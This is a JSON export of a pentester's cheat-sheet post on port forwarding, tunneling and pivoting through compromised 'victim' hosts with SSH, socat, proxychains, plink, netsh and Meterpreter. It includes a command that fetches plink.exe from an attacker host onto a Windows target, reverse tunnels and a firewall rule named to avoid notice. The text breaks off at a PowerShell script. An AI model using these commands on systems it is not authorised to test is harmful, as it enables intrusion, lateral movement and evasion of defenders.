{"id":3109,"date":"2021-05-03T08:49:19","date_gmt":"2021-05-03T06:49:19","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=3109"},"modified":"2026-06-03T20:15:53","modified_gmt":"2026-06-03T18:15:53","slug":"forwarding-tunneling-and-redirections","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=3109","title":{"rendered":"Forwarding, Tunneling and redirections"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Socat<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">If Socat is not on the tar\u00adget sys\u00adtem, <a href=\"https:\/\/github.com\/3ndG4me\/socat\/\">upload a sta\u00adt\u00adic bina\u00adry<\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This will lis\u00adten to port 5555 and for\u00adward it to the giv\u00aden <span class=\"caps\">IP<\/span> on the giv\u00aden port deep\u00ader in the tar\u00adget\u2019s network:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">socat -ddd TCP-LISTEN:5555,reuseaddr,fork TCP:10.4.247.215:5432<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Proxychains<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">! If prox\u00ady\u00adchains is slow, espe\u00adcial\u00adly while port scan\u00adning, try to reduce the fol\u00adlow\u00ading parameters:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"># Some timeouts in milliseconds<br>tcp_read_time_out 1500<br>tcp_connect_time_out 800<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Single pivoting<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Cre\u00adate a <span class=\"caps\">SOCKS<\/span> proxy from the attack\u00ader sys\u00adtem to the victim:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -N -D 127.0.0.1:9990 &lt;username&gt;@$victim<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Con\u00adfig\u00adure prox\u00ady\u00adchains to use this <span class=\"caps\">SOCKS<\/span> proxy. In \/etc\/proxychains.conf, set<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">socks4 127.0.0.1 9990<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Now, prox\u00ady\u00adchain can be prepend\u00aded to com\u00admands, which dynam\u00adi\u00adcal\u00adly redi\u00adrects the pack\u00adets through the sock proxy. E.g. the fol\u00adlow\u00ading scans with nmap on the vic\u00adtim&nbsp;host:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">proxychains nmap -p1-1024 <strong>-sT -Pn<\/strong> 127.0.0.1<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Tip: Use proxychains3 \/ proxychains4 if some\u00adthing does\u00adn\u2019t&nbsp;work.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Double pivoting<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Cre\u00adate a <span class=\"caps\">SOCKS<\/span> proxy from the attack\u00ader sys\u00adtem to the victim:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -N -D 127.0.0.1:9990 &lt;username&gt;@$first_victim<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Note: If for\u00adward\u00ading does\u00adn\u2019t work (all the time), make sure to&nbsp;have<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">TCPKeepAlive yes<br>AllowTCPForwarding yes<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">acti\u00advat\u00aded in the sshd_file of the vic\u00adtim <span class=\"caps\">SSH<\/span> server(s)!<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Option 0<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">Use <span class=\"caps\">SSH<\/span> prox\u00ady\u00adHost to con\u00adnect to the first and then to the sec\u00adond host via one <span class=\"caps\">SOCKS<\/span> proxy. In this case, the prox\u00ady\u00adchains con\u00adfig\u00adu\u00adra\u00adtion file must have only one socks&nbsp;entry.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -N -D 127.0.0.1:9990 -J $user@$jump_host user@$victim<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Option 1<\/h4>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Cre\u00adate on $first_victim a tun\u00adnel to the $second_victim <pre>ssh -N -D 127.0.0.1:9991 -i lr root@$second_victim<\/pre> <\/li>\n\n\n\n<li>Add the sec\u00adond proxy to the prox\u00ady\u00adchains con\u00adfig\u00adu\u00adra\u00adtion. <pre>socks4 127.0.0.1 9990<br>socks4 127.0.0.1 9991<\/pre><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">With this option, prox\u00ady\u00adchains works, but the proxy on port 9990 can\u00adnot be used to reach tar\u00adgets in the sec\u00adond net\u00adwork. To work with Fire\u00adfox, it has to incap\u00adsu\u00adlat\u00aded with prox\u00ady\u00adchains (and no <span class=\"caps\">FF<\/span>&nbsp;proxy)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">MOZ_DISABLE_CONTENT_SANDBOX=1 proxychains4 firefox<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Option 2<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Unsure if this works<\/strong> | Cre\u00adate a sec\u00adond <span class=\"caps\">SOCKS<\/span> proxy on the local system.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">proxychains ssh -N -D 127.0.0.1:9991 &lt;username&gt;@$first_victim<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Now, prox\u00ady\u00adchain can be used. (<a href=\"https:\/\/guif.re\/networkpentest\">See here for source.<\/a>)<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">User-compiled proxy server<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">See local_proxy.go. Change the ports, com\u00adpile it with go build local_proxy.go and upload it.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Netcat<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Port forwarding<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">For\u00adwards port 4444 to 5555 on the same\/another system:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ncat -l 4444 --sh-exec \"ncat 127.0.0.1 5555\"<br>ncat -l 4444 --sh-exec \"ncat 10.4.220.215 5555\"<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Or just with&nbsp;nc:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">mknod mypipe p<br>nc -l -p 4444 &lt; mypipe | nc 127.0.0.1 22 &gt;mypipe<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">SSH<\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">For\u00adward remote port to the local machine:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -L...<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">For\u00adward local port on a remote machine to the local machine:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -R...<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The net\u00adwork lay\u00adout is A -&gt; B -&gt; C -&gt;&nbsp;D.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A is my local&nbsp;host<\/li>\n\n\n\n<li>B ist the target1 host<\/li>\n\n\n\n<li>C is the target2 host.<\/li>\n\n\n\n<li>D ist the target3 host.<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"238\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2021\/05\/tunneling1-1024x238.png\" alt class=\"wp-image-4201\" srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/05\/tunneling1-1024x238.png 1024w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/05\/tunneling1-300x70.png 300w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/05\/tunneling1-768x179.png 768w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/05\/tunneling1.png 1160w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\"><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Scenario 0: Tunnel vom A to A (local port forwarding)<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario: You need to for\u00adward pack\u00adets from port 4444 to 5555 on the same system.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Option 1: Use <span class=\"caps\">SSH<\/span> with localhost:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>ssh -N -v -L 127.0.0.1:4444:127.0.0.1:5555 $user@localhost<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Option 2: Use&nbsp;Socat:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">socat -ddd TCP-LISTEN:4444,reuseaddr,fork TCP:$locaIP:5555<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Scenario 1: Tunnel from A to&nbsp;B<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>On sys\u00adtem A,<\/strong> open a tun\u00adnel which opens local A:5554 which is tun\u00adneled to B:5555:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -N -v -L 127.0.0.1:5554:192.168.10.2:5555 user@192.168.10.2<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Scenario 2: Tunnel from B to&nbsp;A<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>On sys\u00adtem B<\/strong>, open a con\u00adnec\u00adtion to A. This opens A:4141, which can be used to reach B:4444.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -N -R 127.0.0.1:4141:127.0.0.1:4444 naturtrunken@192.168.10.1<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Here, the port is on the same sys\u00adtem&nbsp;B.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Scenario 3.1: Tunnel from A to B to C to reach&nbsp;D<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">On sys\u00adtem C, you can reach port 80 from sys\u00adtem&nbsp;D.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">On sys\u00adtem B, open a local port to C which for\u00adwards traf\u00adfic to D on port&nbsp;80:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssh $C -L 0.0.0.0:5554:$D:80<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">On sys\u00adtem A, con\u00adnect to&nbsp;B:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssh $B -L 127.0.0.1:5555:127.0.0.1:5554<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Scenario 3.2: Tunnel from B to A to reach&nbsp;C<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">On sys\u00adtem B, open a con\u00adnec\u00adtion to A. This opens A:4141, which can be used to reach C:4444.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -N -R 127.0.0.1:4141:10.10.1.3:4444 naturtrunken@192.168.10.1<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Here, the port is on the remote sys\u00adtem&nbsp;C.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Alter\u00adna\u00adtive: Open to connections:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Reverse con\u00adnec\u00adtion to your own host and in the same command<\/li>\n\n\n\n<li>for\u00adward con\u00adnec\u00adtion to the next host (could also be localhost).<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -v -N -R 127.0.0.1:2222:127.0.0.1:6666 -L 127.0.0.1:6666:192.168.220.7:22 dummy@192.168.45.248<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This opens A:2222 -&gt; B:6666-&gt;B:6666 -&gt; C:22<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Scenario 4: Tunnel from A via A-&gt;B-&gt;C-&gt;D<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Pre\u00adreq\u00adui\u00adsites<\/strong>: You have direct access to B and can con\u00adnect <strong>from<\/strong> A <strong>to<\/strong> B.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>On sys\u00adtem B<\/strong>, start <span class=\"caps\">SSH<\/span> lis\u00adten\u00ader to the out\u00adside (A) which for\u00adwards data to the inter\u00adnal host C, which has a direct con\u00adnec\u00adtion to host&nbsp;D.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -N -v -L 0.0.0.0:5555:$hostD:$targetPortD $user@$hostC<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Exam\u00adple: We are on sys\u00adtem&nbsp;B:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -N -v -L 0.0.0.0:5555:172.16.1.4:445 admin@10.10.1.3<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Now we can con\u00adnect from our host&nbsp;A:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">smbclient -p 5555 \/\/192.168.10.2\/secretdir -U peter --password=Sumer2020<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Scenario 5: Tunnel from A to D via A&lt;-B-&gt;C-&gt;D<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Pre\u00adreq\u00adui\u00adsites<\/strong>: You have direct access to B and can con\u00adnect <strong>from<\/strong> B <strong>to<\/strong> A.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">On sys\u00adtem&nbsp;B:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Open a tun\u00adnel on B=(localhost):6666 to D=172.16.1.4:4242 via jumphost C=10.10.1.3:22<br><code>ssh -N -v -L 0.0.0.0:6666:172.16.1.4:4242 database_admin@10.10.1.3<\/code><\/li>\n\n\n\n<li>Start a tun\u00adnel from B back to A=192.168.10.1.<br><code>ssh -N -v -R 192.168.10.1<\/code><code>:4141:127.0.0.1:6666 naturtrunken@192.168.10.1<\/code><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Now, you have on your own host A port 4141 lis\u00adten\u00ading, which will be routet to host D, port&nbsp;4242.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Scenario 6: Tunnel from A to D via A-&gt;B-&gt;C, C-&gt;D<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Sce\u00adnario<\/strong>: You have direct access to B and C and need to for\u00adward A:4141 to D:5555.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">On sys\u00adtem&nbsp;A:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Con\u00adfig\u00adure prox\u00ady\u00adchains to foward all traf\u00adfic to B:9000 (see&nbsp;above).<\/li>\n\n\n\n<li>After all is set up, you can call<br><code>proxychains4 .\/myApplication<\/code><br>which wants access to port D:5555 via local A:4141 via A:proxychains,B:socks,C:SSHtunnel<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">On sys\u00adtem&nbsp;B:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Open a <span class=\"caps\">SOCKS<\/span> proxy port on B:9000 which for\u00adwards all incom\u00ading traf\u00adfic to C:(all ports, <span class=\"caps\">SOCKS<\/span>).<br><code>ssh -N -D 0.0.0.0:9000 $user@10.10.1.3<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">On sys\u00adtem&nbsp;C:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Open a local port for\u00adward\u00ading from C:4141 to D:5555.<br><code>ssh -N -v -L 127.0.0.1:4141:172.16.1.4:5555 $user@localhost<\/code><br><strong>Note<\/strong>: We can also use local\u00adhost to open a port for\u00adward\u00ading from C:8080 to C:8081 on the same sys\u00adtem! (If you do not have cre\u00adden\u00adtials for local\u00adhost ssh, just use socat, see&nbsp;above)<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"caps\">SOCKS<\/span> proxy tunneling<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Like above, use<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -N -D 127.0.0.1:9990 &lt;username&gt;@$victim<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">to cre\u00adate a <span class=\"caps\">SOCKS<\/span> tun\u00adnel to anoth\u00ader sys\u00adtem. Now, e.g. per\u00adform a port scan from the remote system:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">proxychains nmap --top-ports=20 -sT -Pn 172.16.40.0\/24<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">SSHuttle<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">SSH-based for\u00adward\u00ading of <span class=\"caps\">TCP<\/span> pack\u00adets <strong>on giv\u00aden net\u00adworks<\/strong>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Sce\u00adnario<\/strong>: You want to have access to an inter\u00adnal net\u00adwork 10.10.0.0\/16 from your own sys\u00adtem via an attacked sys\u00adtem where you have root privileges.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Exam\u00adple: On your own client:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"># sshuttle -r $user@$target:2222 10.10.0.0\/16 172.16.219.0\/24<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This add a local route to both net\u00adworks via the tar\u00adget&nbsp;host.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Old\u00ader&nbsp;note:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sshuttle \u2013dns \u2011r &lt;target&gt; &lt;network&gt; \u2011x &lt;exclude_network&gt; (eg. sshuttle \u2013dns \u2011r aklingler01 130.83.0.0\/16 \u2011x 192.168.0.0\/16<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Plink<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Plink (in \/us\u00adr\/share\/win\u00addows-bina\u00adries) can be used on a Win\u00addows sys\u00adtem behind a fire\u00adwall to open a reverse tun\u00adnel to the attack\u00ading machine.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Exam\u00adple 1: Exe\u00adcute this from the remote Win\u00addows sys\u00adtem. This opens a local port 5555 which can be used to open a <span class=\"caps\">RDP<\/span> connection.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\/\/ Upload<br>powershell wget -Uri http:\/\/$attacker\/plink.exe -OutFile C:\\Windows\\Temp\\plink.exe<br>\/\/ Reverse shell to an own system with a dummy user\/password.<br>C:\\Windows\\Temp\\plink.exe -ssh -l dummy -pw dummy -R 127.0.0.1:5555:127.0.0.1:3389 192.168.45.248<br><br>\/\/ For example, open RDP now on your own system.<br>$ xfreerdp \/u:$username \/p:$pass \/v:127.0.0.1:5555<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Exam\u00adple 2: This com\u00admand opens a local lis\u00adten\u00ader which receives pack\u00adets from all inter\u00adfaces (0.0.0.0) on port 4444 and for\u00adwards it to the remote sys\u00adtem 192.168.119.158 on port 4444 via the sys\u00adtem 192.168.119.111.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">plink.exe -L 0.0.0.0:4444:192.168.119.158:4444 -N root@192.168.119.111<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">SSH<\/span> tunneling via&nbsp;proxy<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Via <span class=\"caps\">NC<\/span><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The attack\u00ader has a use\u00adful pro\u00adgram on a Win\u00addows system<\/li>\n\n\n\n<li>The Win\u00addows sys\u00adtem is con\u00adnect\u00aded to&nbsp;Kali<\/li>\n\n\n\n<li>The vic\u00adtim has a con\u00adnec\u00adtion to&nbsp;Kali<\/li>\n\n\n\n<li>The Win\u00addows sys\u00adtem should route pack\u00adets through Kali to the victim<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Attacker1 (with win\u00addows program)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -L 5938:192.168.57.2:5940 dussel@192.168.57.2<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Attacker0 (Kali\/has con\u00adnec\u00adtion to the victim)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nc -l -p 5940 -c \"nc 127.0.0.1 5939\"<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Vic\u00adtim (has <em>reverse<\/em> con\u00adnec\u00adtion to attacker0)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">plink-new.exe -v -pw PPPPAAASSS USER@10.10.14.37 -R 5939:localhost:5939<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Via <span class=\"caps\">SOCKS<\/span>&nbsp;proxy<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">You have an open <span class=\"caps\">SOCKS<\/span> proxy (e.g. with chis\u00adel). You want to use <span class=\"caps\">SSH<\/span> over it, which can\u00adnot use <span class=\"caps\">SOCKS<\/span> native\u00adly. Use the Prox\u00ady\u00adCommand. This uses a <span class=\"caps\">SOCKS<\/span> proxy via ncat for the <span class=\"caps\">SSH<\/span> client!<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' $user@$systemC<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Note: In this example,<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A is your sys\u00adtem from which this com\u00admand is executed,<\/li>\n\n\n\n<li>your <span class=\"caps\">SOCKS<\/span> proxy ter\u00admi\u00adnates on B (e.g. with chis\u00adel)&nbsp;and<\/li>\n\n\n\n<li>$sys\u00adtemC is here anoth\u00ader sys\u00adtem which is reach\u00adable via the target<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Via Meterpreter<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">You have exploit\u00aded host A and want to exploit host B, which can only be reached via&nbsp;A.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Start a meter\u00adpreter ses\u00adsion on&nbsp;A.<\/li>\n\n\n\n<li>Bring cur\u00adrent ses\u00adsion into the background<\/li>\n\n\n\n<li>Set up a route to B via A<br><code>msf&gt; route add $victimBSubnet $netmask $session_id<\/code><\/li>\n\n\n\n<li>Set up the sec\u00adond exploit normally.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">This sets up a route to a net\u00adwork via host&nbsp;A.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">rinetd<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">TCP<\/span> redi\u00adrec\u00adtions (no <span class=\"caps\">UDP<\/span> \u2014 no stan\u00addard <span class=\"caps\">FTP<\/span>!) Define in \/etc\/rinetd.conf the source address\/port and tar\u00adget address\/port and restart the service.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Using IPv6 for IPv4-based tools<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario: You found an open  remote port via IPv6 and want to use a tool against it, which does\u00adn\u2019t have IPv6 sup\u00adport or has prob\u00adlems with&nbsp;it.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">From Linux<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Use the <a href=\"https:\/\/github.com\/aatlasis\/Chiron\">chi\u00adron proxy<\/a> (<a href=\"https:\/\/raw.githubusercontent.com\/aatlasis\/Chiron\/master\/Chiron_Tutorial.pdf\">doc\u00adu\u00admen\u00adta\u00adtion<\/a>). The fol\u00adlow\u00ading com\u00admand will cre\u00adate a proxy lis\u00adten\u00ader on 127.0.0.3 which can used by all tools to con\u00adnect to the giv\u00aden des\u00adti\u00adna\u00adtion IPv6 address.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@imac2019-kali:\/opt\/Chiron\/bin# venv\/bin\/python2.7 chiron_proxy.py eth0 lo 127.0.0.1 127.0.0.3 -d 2001:a61:5e2:b201:45ae:677a:96cc:aff9<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">From Windows<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">1. In the Win\u00addows tar\u00adget sys\u00adtem as admin\u00adis\u00adtra\u00adtor open a lis\u00adten\u00ading port. In this example:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Lis\u00adten on the IPv6 interface<\/li>\n\n\n\n<li>Lis\u00adten on port&nbsp;80<\/li>\n\n\n\n<li>Redi\u00adrect all traf\u00adfic to port&nbsp;445.<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">netsh interface portproxy add v4tov6 listenport=445 connectport=80 connectaddress=fe80::...:7636<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">2. On the attack\u00ader sys\u00adtem, start socat to open a local lis\u00adten\u00ader which redi\u00adrects all traf\u00adfic to the giv\u00aden IPv6 address and&nbsp;port.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"># socat TCP-LISTEN:445,reuseaddr,fork TCP6:[2001:...:7636]:445<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">3. Start Chi\u00adron proxy to open a local IPv4 lis\u00adten\u00ading port which redi\u00adrects every\u00adthing to the local (socat) IPv6 port. Des\u00adti\u00adna\u00adtion is the local\u00adhost loop\u00adback address.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"># venv\/bin\/python2.7 chiron_proxy.py eth0 lo 127.0.0.1 127.0.0.3 -d fe80::...<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">4. Now, access is pos\u00adsi\u00adble via local IPv4 tool. Example:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">smbclient \\\\\\\\127.0.0.3\\\\share -U joe<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">With just&nbsp;nc<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">This lis\u00adtens on 4141 and for\u00adwards all to 5555. Depend\u00ading on the nc ver\u00adsion, <code>-e<\/code> could be used instead of \u2011c. <em>May not&nbsp;work.<\/em><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nc -l -p 4141 -c \"nc 10.0.0.4 5555\"<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Windows<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">In Win\u00addows, plink.exe (part of the PuT\u00adTY project) can be used to for\u00adward ports on a remote win\u00addows sys\u00adtem to a local&nbsp;Kali.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Since 2018, Win\u00addows con\u00adtains <span class=\"caps\">SSH<\/span> exe\u00adcute\u00adables in <code>%SYSTEMROOT%\\System32\\OpenSSH<\/code> per default.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Local port forwarding with&nbsp;netsh<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">This needs admin\u00adis\u00adtra\u00adtor privilege.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The fol\u00adlow\u00ading opens a local lis\u00adten\u00ader on 4141 and for\u00adwards it to the remote host on the same&nbsp;port:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4141 connectaddress=10.10.10.18 connectport=4141<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Check with this com\u00admand open port forwarding:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">netsh interface portproxy show all<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">(!) After\u00adwards, you may have to open a port in the fire\u00adwall! <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2233\" data-type=\"post\" data-id=\"2233\">See the Win\u00addows Firewall\/netsh section.<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Example with reverse <span class=\"caps\">SSH<\/span> tunnel and local port forwarding<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Sce\u00adnario<\/strong>: You want to access C=10.10.10.5:5555 from A:4141 via Win\u00addows sys\u00adtem B, where you have admin\u00adis\u00adtra\u00adtor privileges.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Open a reverse <span class=\"caps\">SSH<\/span> tun\u00adnel to open A:4141 which goes to B:4141:<br><code>ssh -N -R 127.0.0.1:4141:127.0.0.1:4141 dummy@$attackerIP<\/code><\/li>\n\n\n\n<li>Add port for\u00adward\u00ading in an admin\u00adis\u00adtra\u00adtive cmd on the Win\u00addows sys\u00adtem B:<br><code>netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4141 connectaddress=10.10.10.5 connectport=5555<\/code><\/li>\n\n\n\n<li>Open fire\u00adwall on B:<br><code>netsh advfirewall firewall add rule name=\"port_forward_ssh_or_some_non_suspicous_name_here\" protocol=TCP dir=in localip=$ipFromThisSystemB localport=4141 action=allow<\/code><\/li>\n\n\n\n<li>Do your&nbsp;stuff<\/li>\n\n\n\n<li>Remove fire\u00adwall hole after\u00adwards:<br><code>netsh advfirewall firewall delete rule name=\"port_forward_ssh_or_some_non_suspicous_name_here<\/code><code>\"<\/code><\/li>\n\n\n\n<li>Remove port for\u00adward\u00ading after\u00adwards:<br><code>netsh interface portproxy del v4tov4 listenport=4141 listenaddress=$ipFromThisSystemB<\/code><\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">PowerShell script<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Use the fol\u00adlow\u00ading script on a Win\u00addows sys\u00adtem to start a prim\u00adi\u00adtive port forwarder:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"powershell\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers 